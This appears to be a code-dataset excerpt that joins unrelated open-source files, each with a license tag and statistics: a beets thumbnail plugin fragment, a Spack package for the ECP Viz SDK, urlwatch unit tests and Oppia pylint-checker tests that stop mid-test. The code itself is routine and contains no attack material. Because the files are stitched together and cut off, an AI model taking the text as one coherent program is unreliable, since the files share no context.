thumbnails_command.func = self.process_query
return [thumbnails_command]
def process_query(self, lib, opts, args):
self.config.set_args(opts)
if self._check_local_ok():
for album in lib.albums(decargs(args)):
self.process_album(album)
def _check_local_ok(self):
"""Check that's everythings ready:
- local capability to resize images
- thumbnail dirs exist (create them if needed)
- detect whether we'll use PIL or IM
- detect whether we'll use GIO or Python to get URIs
"""
if not ArtResizer.shared.local:
self._log.warning(u"No local image resizing capabilities, "
u"cannot generate thumbnails")
return False
for dir in (NORMAL_DIR, LARGE_DIR):
if not os.path.exists(dir):
os.makedirs(dir)
if get_im_version():
self.write_metadata = write_metadata_im
tool = "IM"
else:
assert get_pil_version() # since we're local
self.write_metadata = write_metadata_pil
tool = "PIL"
self._log.debug(u"using {0} to write metadata", tool)
uri_getter = GioURI()
if not uri_getter.available:
uri_getter = PathlibURI()
self._log.debug(u"using {0.name} to compute URIs", uri_getter)
self.get_uri = uri_getter.uri
return True
def process_album(self, album):
"""Produce thumbnails for the album folder.
"""
self._log.debug(u'generating thumbnail for {0}', album)
if not album.artpath:
self._log.info(u'album {0} has no art', album)
return
if self.config['dolphin']:
self.make_dolphin_cover_thumbnail(album)
size = ArtResizer.shared.get_size(album.artpath)
if not size:
self._log.warning(u'problem getting the picture size for {0}',
album.artpath)
return
wrote = True
if max(size) >= 256:
wrote &= self.make_cover_thumbnail(album, 256, LARGE_DIR)
wrote &= self.make_cover_thumbnail(album, 128, NORMAL_DIR)
if wrote:
self._log.info(u'wrote thumbnail for {0}', album)
else:
self._log.info(u'nothing to do for {0}', album)
def make_cover_thumbnail(self, album, size, target_dir):
"""Make a thumbnail of given size for `album` and put it in
`target_dir`.
"""
target = os.path.join(target_dir, self.thumbnail_file_name(album.path))
if os.path.exists(target) and \
os.stat(target).st_mtime > os.stat(album.artpath).st_mtime:
if self.config['force']:
self._log.debug(u"found a suitable {1}x{1} thumbnail for {0}, "
u"forcing regeneration", album, size)
else:
self._log.debug(u"{1}x{1} thumbnail for {0} exists and is "
u"recent enough", album, size)
return False
resized = ArtResizer.shared.resize(size, album.artpath,
util.syspath(target))
self.add_tags(album, util.syspath(resized))
shutil.move(resized, target)
return True
def thumbnail_file_name(self, path):
"""Compute the thumbnail file name
See https://standards.freedesktop.org/thumbnail-spec/latest/x227.html
"""
uri = self.get_uri(path)
hash = md5(uri.encode('utf-8')).hexdigest()
return util.bytestring_path("{0}.png".format(hash))
def add_tags(self, album, image_path):
"""Write required metadata to the thumbnail
See https://standards.freedesktop.org/thumbnail-spec/latest/x142.html
"""
mtime = os.stat(album.artpath).st_mtime
metadata = {"Thumb::URI": self.get_uri(album.artpath),
"Thumb::MTime": six.text_type(mtime)}
try:
self.write_metadata(image_path, metadata)
except Exception:
self._log.exception(u"could not write metadata to {0}",
util.displayable_path(image_path))
def make_dolphin_cover_thumbnail(self, album):
outfilename = os.path.join(album.path, b".directory")
if os.path.exists(outfilename):
return
artfile = os.path.split(album.artpath)[1]
with open(outfilename, 'w') as f:
f.write('[Desktop Entry]\n')
f.write('Icon=./{0}'.format(artfile.decode('utf-8')))
f.close()
self._log.debug(u"Wrote file {0}", util.displayable_path(outfilename))
def write_metadata_im(file, metadata):
"""Enrich the file metadata with `metadata` dict thanks to IM."""
command = ['convert', file] + \
list(chain.from_iterable(('-set', k, v)
for k, v in metadata.items())) + [file]
util.command_output(command)
return True
def write_metadata_pil(file, metadata):
"""Enrich the file metadata with `metadata` dict thanks to PIL."""
from PIL import Image, PngImagePlugin
im = Image.open(file)
meta = PngImagePlugin.PngInfo()
for k, v in metadata.items():
meta.add_text(k, v, 0)
im.save(file, "PNG", pnginfo=meta)
return True
class URIGetter(object):
available = False
name = "Abstract base"
def uri(self, path):
raise NotImplementedError()
class PathlibURI(URIGetter):
available = True
name = "Python Pathlib"
def uri(self, path):
return PurePosixPath(path).as_uri()
def copy_c_string(c_string):
"""Copy a `ctypes.POINTER(ctypes.c_char)` value into a new Python
string and return it. The old memory is then safe to free.
"""
# This is a pretty dumb way to get a string copy, but it seems to
# work. A more surefire way would be to allocate a ctypes buffer and copy
# the data with `memcpy` or somesuch.
s = ctypes.cast(c_string, ctypes.c_char_p).value
return b'' + s
class GioURI(URIGetter):
"""Use gio URI function g_file_get_uri. Paths must be utf-8 encoded.
"""
name = "GIO"
def __init__(self):
self.libgio = self.get_library()
self.available = bool(self.libgio)
if self.available:
self.libgio.g_type_init() # for glib < 2.36
self.libgio.g_file_get_uri.argtypes = [ctypes.c_char_p]
self.libgio.g_file_new_for_path.restype = ctypes.c_void_p
self.libgio.g_file_get_uri.argtypes = [ctypes.c_void_p]
self.libgio.g_file_get_uri.restype = ctypes.POINTER(ctypes.c_char)
self.libgio.g_object_unref.argtypes = [ctypes.c_void_p]
def get_library(self):
lib_name = ctypes.util.find_library("gio-2")
try:
if not lib_name:
return False
return ctypes.cdll.LoadLibrary(lib_name)
except OSError:
return False
def uri(self, path):
g_file_ptr = self.libgio.g_file_new_for_path(path)
if not g_file_ptr:
raise RuntimeError(u"No gfile pointer received for {0}".format(
util.displayable_path(path)))
try:
uri_ptr = self.libgio.g_file_get_uri(g_file_ptr)
finally:
self.libgio.g_object_unref(g_file_ptr)
if not uri_ptr:
self.libgio.g_free(uri_ptr)
raise RuntimeError(u"No URI received from the gfile pointer for "
u"{0}".format(util.displayable_path(path)))
try:
uri = copy_c_string(uri_ptr)
finally:
self.libgio.g_free(uri_ptr)
try:
return uri.decode(util._fsencoding())
except UnicodeDecodeError:
raise RuntimeError(
"Could not decode filename from GIO: {!r}".format(uri)
)
|
mit
| 7,912,181,659,199,033,000 | 34.506803 | 79 | 0.599387 | false |
iulian787/spack
|
var/spack/repos/builtin/packages/ecp-viz-sdk/package.py
|
2
|
1561
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class EcpVizSdk(BundlePackage):
"""ECP Viz & Analysis SDK"""
homepage = "https://github.com/chuckatkins/ecp-data-viz-sdk"
git = "https://github.com/chuckatkins/ecp-data-viz-sdk.git"
maintainers = ['chuckatkins']
version('1.0', branch='master')
variant('ascent', default=False, description="Enable Ascent")
# variant('catalyst', default=False, description="Enable Catalyst")
variant('paraview', default=False, description="Enable ParaView")
variant('sz', default=False, description="Enable SZ")
variant('vtkm', default=False, description="Enable VTK-m")
variant('zfp', default=False, description="Enable ZFP")
# Outstanding build issues
# variant('visit', default=False, description="Enable VisIt")
# Missing spack package
# variant('cinema', default=False, description="Enable Cinema")
# variant('rover', default=False, description="Enable ROVER")
depends_on('ascent+shared+mpi+fortran+openmp+python+vtkh+dray', when='+ascent')
depends_on('catalyst', when='+catalyst')
depends_on('paraview+shared+mpi+python3+hdf5+kits', when='+paraview')
depends_on('visit', when='+visit')
depends_on('vtk-m+shared+mpi+openmp+rendering', when='+vtkm')
depends_on('sz+shared+fortran+hdf5+python+random_access', when='+sz')
depends_on('zfp', when='+zfp')
|
lgpl-2.1
| -6,184,281,966,907,562,000 | 39.025641 | 83 | 0.696348 | false |
lechuckcaptain/urlwatch
|
test/test_handler.py
|
1
|
4525
|
import sys
from glob import glob
import pycodestyle as pycodestyle
from urlwatch.jobs import UrlJob, JobBase, ShellJob
from urlwatch.storage import UrlsYaml, UrlsTxt
from nose.tools import raises, with_setup
import tempfile
import os
import imp
from lib.urlwatch import storage
from lib.urlwatch.config import BaseConfig
from lib.urlwatch.storage import JsonConfigStorage, YamlConfigStorage, UrlsJson, CacheMiniDBStorage
from lib.urlwatch.main import Urlwatch
def test_required_classattrs_in_subclasses():
for kind, subclass in JobBase.__subclasses__.items():
assert hasattr(subclass, '__kind__')
assert hasattr(subclass, '__required__')
assert hasattr(subclass, '__optional__')
def test_save_load_jobs():
jobs = [
UrlJob(name='news', url='http://news.orf.at/'),
ShellJob(name='list homedir', command='ls ~'),
ShellJob(name='list proc', command='ls /proc'),
]
with tempfile.NamedTemporaryFile() as tmp:
UrlsYaml(tmp.name).save(jobs)
jobs2 = UrlsYaml(tmp.name).load()
os.chmod(tmp.name, 0o777)
jobs3 = UrlsYaml(tmp.name).load_secure()
assert len(jobs2) == len(jobs)
# Assert that the shell jobs have been removed due to secure loading
assert len(jobs3) == 1
def test_load_config_yaml():
config_json = os.path.join(os.path.dirname(__file__), 'data', 'urlwatch.yaml')
if os.path.exists(config_json):
config = YamlConfigStorage(config_json)
assert config is not None
assert config.config is not None
assert config.config == storage.DEFAULT_CONFIG
def test_load_config_json():
config_json = os.path.join(os.path.dirname(__file__), 'data', 'urlwatch.json')
if os.path.exists(config_json):
config = JsonConfigStorage(config_json)
assert config is not None
assert config.config is not None
assert config.config == storage.DEFAULT_CONFIG
def test_load_urls_txt():
urls_txt = os.path.join(os.path.dirname(__file__), 'data', 'urls.txt')
if os.path.exists(urls_txt):
assert len(UrlsTxt(urls_txt).load_secure()) > 0
def test_load_urls_json():
urls_txt = os.path.join(os.path.dirname(__file__), 'data', 'urls.json')
if os.path.exists(urls_txt):
assert len(UrlsJson(urls_txt).load_secure()) > 0
def test_load_urls_yaml():
urls_yaml = 'share/urlwatch/examples/urls.yaml.example'
if os.path.exists(urls_yaml):
assert len(UrlsYaml(urls_yaml).load_secure()) > 0
def test_load_hooks_py():
hooks_py = 'share/urlwatch/examples/hooks.py.example'
if os.path.exists(hooks_py):
imp.load_source('hooks', hooks_py)
def test_pep8_conformance():
"""Test that we conform to PEP-8."""
style = pycodestyle.StyleGuide(ignore=['E501', 'E402'])
py_files = [y for x in os.walk(os.path.abspath('.')) for y in glob(os.path.join(x[0], '*.py'))]
py_files.append(os.path.abspath('urlwatch'))
result = style.check_files(py_files)
assert result.total_errors == 0, "Found #{0} code style errors".format(result.total_errors)
class TestConfig(BaseConfig):
def __init__(self, config, urls, cache, hooks, verbose):
(prefix, bindir) = os.path.split(os.path.dirname(os.path.abspath(sys.argv[0])))
super().__init__('urlwatch', os.path.dirname(__file__), config, urls, cache, hooks, verbose)
def teardown_func():
"tear down test fixtures"
cache = os.path.join(os.path.dirname(__file__), 'data', 'cache.db')
if os.path.exists(cache):
os.remove(cache)
@with_setup(teardown=teardown_func)
def test_run_watcher():
urls = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'share', 'urlwatch', 'examples', 'urls.yaml.example')
config = os.path.join(os.path.dirname(__file__), 'data', 'urlwatch.yaml')
cache = os.path.join(os.path.dirname(__file__), 'data', 'cache.db')
hooks = ''
config_storage = YamlConfigStorage(config)
cache_storage = CacheMiniDBStorage(cache)
urls_storage = UrlsYaml(urls)
urlwatch_config = TestConfig(config, urls, cache, hooks, True)
urlwatcher = Urlwatch(urlwatch_config, config_storage, cache_storage, urls_storage)
urlwatcher.run_jobs()
def test_unserialize_shell_job_without_kind():
job = JobBase.unserialize({
'name': 'hoho',
'command': 'ls',
})
assert isinstance(job, ShellJob)
@raises(ValueError)
def test_unserialize_with_unknown_key():
JobBase.unserialize({
'unknown_key': 123,
'name': 'hoho',
})
|
bsd-3-clause
| 80,278,206,530,138,000 | 31.092199 | 121 | 0.661215 | false |
prasanna08/oppia
|
scripts/linters/pylint_extensions_test.py
|
1
|
105003
|
# coding: utf-8
#
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For details on how to write such tests, please refer to
# https://github.com/oppia/oppia/wiki/Writing-Tests-For-Pylint
"""Unit tests for scripts/pylint_extensions."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import tempfile
import unittest
import python_utils
from . import pylint_extensions
import astroid # isort:skip
from pylint import testutils # isort:skip
from pylint import lint # isort:skip
from pylint import utils # isort:skip
class ExplicitKeywordArgsCheckerTests(unittest.TestCase):
def setUp(self):
super(ExplicitKeywordArgsCheckerTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.ExplicitKeywordArgsChecker)
self.checker_test_object.setup_method()
def test_finds_non_explicit_keyword_args(self):
(
func_call_node_one, func_call_node_two, func_call_node_three,
func_call_node_four, func_call_node_five, func_call_node_six,
class_call_node) = astroid.extract_node(
"""
class TestClass():
pass
def test(test_var_one, test_var_two=4, test_var_three=5,
test_var_four="test_checker"):
test_var_five = test_var_two + test_var_three
return test_var_five
def test_1(test_var_one, test_var_one):
pass
def test_2((a, b)):
pass
test(2, 5, test_var_three=6) #@
test(2) #@
test(2, 6, test_var_two=5, test_var_four="test_checker") #@
max(5, 1) #@
test_1(1, 2) #@
test_2((1, 2)) #@
TestClass() #@
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='non-explicit-keyword-args',
node=func_call_node_one,
args=(
'\'test_var_two\'',
'function',
'test'
)
),
):
self.checker_test_object.checker.visit_call(
func_call_node_one)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(
func_call_node_two)
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='non-explicit-keyword-args',
node=func_call_node_three,
args=(
'\'test_var_three\'',
'function',
'test'
)
)
):
self.checker_test_object.checker.visit_call(
func_call_node_three)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(class_call_node)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(func_call_node_four)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(func_call_node_five)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(func_call_node_six)
def test_finds_arg_name_for_non_keyword_arg(self):
node_arg_name_for_non_keyword_arg = astroid.extract_node(
"""
def test(test_var_one, test_var_two=4, test_var_three=5):
test_var_five = test_var_two + test_var_three
return test_var_five
test(test_var_one=2, test_var_two=5) #@
""")
message = testutils.Message(
msg_id='arg-name-for-non-keyword-arg',
node=node_arg_name_for_non_keyword_arg,
args=('\'test_var_one\'', 'function', 'test'))
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_call(
node_arg_name_for_non_keyword_arg)
def test_correct_use_of_keyword_args(self):
node_with_no_error_message = astroid.extract_node(
"""
def test(test_var_one, test_var_two=4, test_var_three=5):
test_var_five = test_var_two + test_var_three
return test_var_five
test(2, test_var_two=2) #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(
node_with_no_error_message)
def test_function_with_args_and_kwargs(self):
node_with_args_and_kwargs = astroid.extract_node(
"""
def test_1(*args, **kwargs):
pass
test_1(first=1, second=2) #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(
node_with_args_and_kwargs)
def test_constructor_call_with_keyword_arguments(self):
node_with_no_error_message = astroid.extract_node(
"""
class TestClass():
def __init__(self, first, second):
pass
TestClass(first=1, second=2) #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(
node_with_no_error_message)
def test_register(self):
pylinter_instance = lint.PyLinter()
pylint_extensions.register(pylinter_instance)
class HangingIndentCheckerTests(unittest.TestCase):
def setUp(self):
super(HangingIndentCheckerTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.HangingIndentChecker)
self.checker_test_object.setup_method()
def test_no_break_after_hanging_indentation(self):
node_break_after_hanging_indent = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""self.post_json('/ml/\\trainedclassifierhandler',
self.payload, expect_errors=True, expected_status_int=401)
if (a > 1 and
b > 2):
""")
node_break_after_hanging_indent.file = filename
node_break_after_hanging_indent.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_break_after_hanging_indent))
message = testutils.Message(
msg_id='no-break-after-hanging-indent', line=1)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_no_break_after_hanging_indentation_with_comment(self):
node_break_after_hanging_indent = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""self.post_json('/ml/\\trainedclassifierhandler', # pylint: disable=invalid-name
self.payload, expect_errors=True, expected_status_int=401)
if (a > 1 and
b > 2): # pylint: disable=invalid-name
""")
node_break_after_hanging_indent.file = filename
node_break_after_hanging_indent.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_break_after_hanging_indent))
message = testutils.Message(
msg_id='no-break-after-hanging-indent', line=1)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_break_after_hanging_indentation(self):
node_with_no_error_message = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""\"\"\"Some multiline
docstring.
\"\"\"
# Load JSON.
master_translation_dict = json.loads(
utils.get_file_contents(os.path.join(
os.getcwd(), 'assets', 'i18n', 'en.json')))
""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_with_no_error_message))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_hanging_indentation_with_a_comment_after_bracket(self):
node_with_no_error_message = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""self.post_json( # pylint-disable=invalid-name
'(',
self.payload, expect_errors=True, expected_status_int=401)""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_with_no_error_message))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_hanging_indentation_with_a_comment_after_two_or_more_bracket(self):
node_with_no_error_message = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""self.post_json(func( # pylint-disable=invalid-name
'(',
self.payload, expect_errors=True, expected_status_int=401))""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_with_no_error_message))
with self.checker_test_object.assertNoMessages():
temp_file.close()
class DocstringParameterCheckerTests(unittest.TestCase):
def setUp(self):
super(DocstringParameterCheckerTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.DocstringParameterChecker)
self.checker_test_object.setup_method()
def test_no_newline_below_class_docstring(self):
node_no_newline_below_class_docstring = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(dummy_class):
\"\"\"This is a docstring.\"\"\"
a = 1 + 2
""")
node_no_newline_below_class_docstring.file = filename
node_no_newline_below_class_docstring.path = filename
self.checker_test_object.checker.visit_classdef(
node_no_newline_below_class_docstring)
message = testutils.Message(
msg_id='newline-below-class-docstring',
node=node_no_newline_below_class_docstring)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_excessive_newline_below_class_docstring(self):
node_excessive_newline_below_class_docstring = (
astroid.scoped_nodes.Module(
name='test',
doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(dummy_class):
\"\"\"This is a docstring.\"\"\"
a = 1 + 2
""")
node_excessive_newline_below_class_docstring.file = filename
node_excessive_newline_below_class_docstring.path = filename
self.checker_test_object.checker.visit_classdef(
node_excessive_newline_below_class_docstring)
message = testutils.Message(
msg_id='newline-below-class-docstring',
node=node_excessive_newline_below_class_docstring)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_inline_comment_after_class_docstring(self):
node_inline_comment_after_class_docstring = (
astroid.scoped_nodes.Module(
name='test',
doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(dummy_class):
\"\"\"This is a docstring.\"\"\"
# This is a comment.
def func():
a = 1 + 2
""")
node_inline_comment_after_class_docstring.file = filename
node_inline_comment_after_class_docstring.path = filename
self.checker_test_object.checker.visit_classdef(
node_inline_comment_after_class_docstring)
message = testutils.Message(
msg_id='newline-below-class-docstring',
node=node_inline_comment_after_class_docstring)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_multiline_class_argument_with_incorrect_style(self):
node_multiline_class_argument_with_incorrect_style = (
astroid.scoped_nodes.Module(
name='test',
doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(
dummy_class):
\"\"\"This is a docstring.\"\"\"
a = 1 + 2
""")
node_multiline_class_argument_with_incorrect_style.file = filename
node_multiline_class_argument_with_incorrect_style.path = filename
self.checker_test_object.checker.visit_classdef(
node_multiline_class_argument_with_incorrect_style)
message = testutils.Message(
msg_id='newline-below-class-docstring',
node=node_multiline_class_argument_with_incorrect_style)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_multiline_class_argument_with_correct_style(self):
node_multiline_class_argument_with_correct_style = (
astroid.scoped_nodes.Module(
name='test',
doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(
dummy_class):
\"\"\"This is a docstring.\"\"\"
a = 1 + 2
""")
node_multiline_class_argument_with_correct_style.file = filename
node_multiline_class_argument_with_correct_style.path = filename
self.checker_test_object.checker.visit_classdef(
node_multiline_class_argument_with_correct_style)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_single_newline_below_class_docstring(self):
node_with_no_error_message = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(dummy_class):
\"\"\"This is a multiline docstring.\"\"\"
a = 1 + 2
""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
self.checker_test_object.checker.visit_classdef(
node_with_no_error_message)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_class_with_no_docstring(self):
node_class_with_no_docstring = astroid.scoped_nodes.Module(
name='test',
doc=None)
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(dummy_class):
a = 1 + 2
""")
node_class_with_no_docstring.file = filename
node_class_with_no_docstring.path = filename
self.checker_test_object.checker.visit_classdef(
node_class_with_no_docstring)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_newline_before_docstring_with_correct_style(self):
node_newline_before_docstring_with_correct_style = (
astroid.scoped_nodes.Module(
name='test',
doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(dummy_class):
\"\"\"This is a multiline docstring.\"\"\"
a = 1 + 2
""")
node_newline_before_docstring_with_correct_style.file = filename
node_newline_before_docstring_with_correct_style.path = filename
self.checker_test_object.checker.visit_classdef(
node_newline_before_docstring_with_correct_style)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_newline_before_docstring_with_incorrect_style(self):
node_newline_before_docstring_with_incorrect_style = (
astroid.scoped_nodes.Module(
name='test',
doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(dummy_class):
\"\"\"This is a multiline docstring.\"\"\"
a = 1 + 2
""")
node_newline_before_docstring_with_incorrect_style.file = filename
node_newline_before_docstring_with_incorrect_style.path = filename
self.checker_test_object.checker.visit_classdef(
node_newline_before_docstring_with_incorrect_style)
message = testutils.Message(
msg_id='newline-below-class-docstring',
node=node_newline_before_docstring_with_incorrect_style)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_malformed_args_section(self):
node_malformed_args_section = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Does nothing.
Args:
arg: Argument description.
\"\"\"
a = True
""")
message = testutils.Message(
msg_id='malformed-args-section',
node=node_malformed_args_section
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_malformed_args_section)
def test_malformed_returns_section(self):
node_malformed_returns_section = astroid.extract_node(
u"""def func(): #@
\"\"\"Return True.
Returns:
arg: Argument description.
\"\"\"
return True
""")
message = testutils.Message(
msg_id='malformed-returns-section',
node=node_malformed_returns_section
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_malformed_returns_section)
def test_malformed_yields_section(self):
node_malformed_yields_section = astroid.extract_node(
u"""def func(): #@
\"\"\"Yield true.
Yields:
yields: Argument description.
\"\"\"
yield True
""")
message = testutils.Message(
msg_id='malformed-yields-section',
node=node_malformed_yields_section
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_malformed_yields_section)
def test_malformed_raises_section(self):
node_malformed_raises_section = astroid.extract_node(
u"""def func(): #@
\"\"\"Raise an exception.
Raises:
Exception: Argument description.
\"\"\"
raise Exception()
""")
message = testutils.Message(
msg_id='malformed-raises-section',
node=node_malformed_raises_section
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_malformed_raises_section)
def test_malformed_args_argument(self):
node_malformed_args_argument = astroid.extract_node(
u"""def func(*args): #@
\"\"\"Does nothing.
Args:
*args: int. Argument description.
\"\"\"
a = True
""")
message = testutils.Message(
msg_id='malformed-args-argument',
node=node_malformed_args_argument
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_malformed_args_argument)
def test_well_formated_args_argument(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(*args): #@
\"\"\"Does nothing.
Args:
*args: list(*). Description.
\"\"\"
a = True
""")
with self.checker_test_object.assertAddsMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
def test_well_formated_args_section(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Does nothing.
Args:
arg: argument. Description.
\"\"\"
a = True
""")
with self.checker_test_object.assertAddsMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
def test_well_formated_returns_section(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(): #@
\"\"\"Does nothing.
Returns:
int. Argument escription.
\"\"\"
return args
""")
with self.checker_test_object.assertAddsMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
def test_well_formated_yields_section(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(): #@
\"\"\"Does nothing.
Yields:
arg. Argument description.
\"\"\"
yield args
""")
with self.checker_test_object.assertAddsMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
def test_space_after_docstring(self):
node_space_after_docstring = astroid.extract_node(
u"""def func():
\"\"\" Hello world.\"\"\"
Something
""")
message = testutils.Message(
msg_id='space-after-triple-quote',
node=node_space_after_docstring)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_space_after_docstring)
def test_single_line_docstring_span_two_lines(self):
node_single_line_docstring_span_two_lines = astroid.extract_node(
u"""def func(): #@
\"\"\"This is a docstring.
\"\"\"
Something
""")
message = testutils.Message(
msg_id='single-line-docstring-span-two-lines',
node=node_single_line_docstring_span_two_lines)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_single_line_docstring_span_two_lines)
def test_no_period_at_end(self):
node_no_period_at_end = astroid.extract_node(
u"""def func(): #@
\"\"\"This is a docstring\"\"\"
Something
""")
message = testutils.Message(
msg_id='no-period-used',
node=node_no_period_at_end)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_no_period_at_end)
def test_empty_line_before_end_of_docstring(self):
node_empty_line_before_end = astroid.extract_node(
u"""def func(): #@
\"\"\"This is a docstring.
\"\"\"
Something
""")
message = testutils.Message(
msg_id='empty-line-before-end', node=node_empty_line_before_end)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_empty_line_before_end)
def test_no_period_at_end_of_a_multiline_docstring(self):
node_no_period_at_end = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Args:
arg: variable. Desciption
\"\"\"
Something
""")
no_period_at_end_message = testutils.Message(
msg_id='no-period-used', node=node_no_period_at_end)
malformed_args_message = testutils.Message(
msg_id='malformed-args-section', node=node_no_period_at_end)
with self.checker_test_object.assertAddsMessages(
no_period_at_end_message, malformed_args_message):
self.checker_test_object.checker.visit_functiondef(
node_no_period_at_end)
def test_no_newline_at_end_of_multi_line_docstring(self):
node_no_newline_at_end = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Args:
arg: variable. Description.\"\"\"
Something
""")
message = testutils.Message(
msg_id='no-newline-used-at-end', node=node_no_newline_at_end)
with self.checker_test_object.assertAddsMessages(message):
